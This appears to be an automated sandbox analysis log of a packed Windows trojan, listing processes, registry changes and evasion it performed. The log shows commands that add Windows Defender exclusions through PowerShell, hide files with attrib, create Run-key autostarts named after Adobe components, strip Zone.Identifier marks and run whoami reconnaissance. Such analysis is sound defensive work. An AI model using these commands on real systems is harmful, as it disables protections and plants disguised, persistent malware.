Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220114

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drkkekrp.vde.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@232/30@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:720:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

String found in binary or memory: #/Add5

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Static file information: File size 1843200 > 1048576

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x1c1c00

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Static PE information: section name: UPX2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\acrotray.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns

Source: C:\Windows\System32\cmd.exe

PE file moved: C:\Windows\acrotray.exerd

Jump to behavior

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray

Jump to behavior

Creates multiple autostart registry keys

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray	Jump to behavior
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar

Uses whoami command line tool to query computer and username

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray	Jump to behavior
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 20000
Source: unknown	Network traffic detected: HTTP traffic on port 20000 -> 49751

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	File opened: C:\Windows\acrotray.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes \| delete \| synchronize
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes \| delete \| synchronize

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
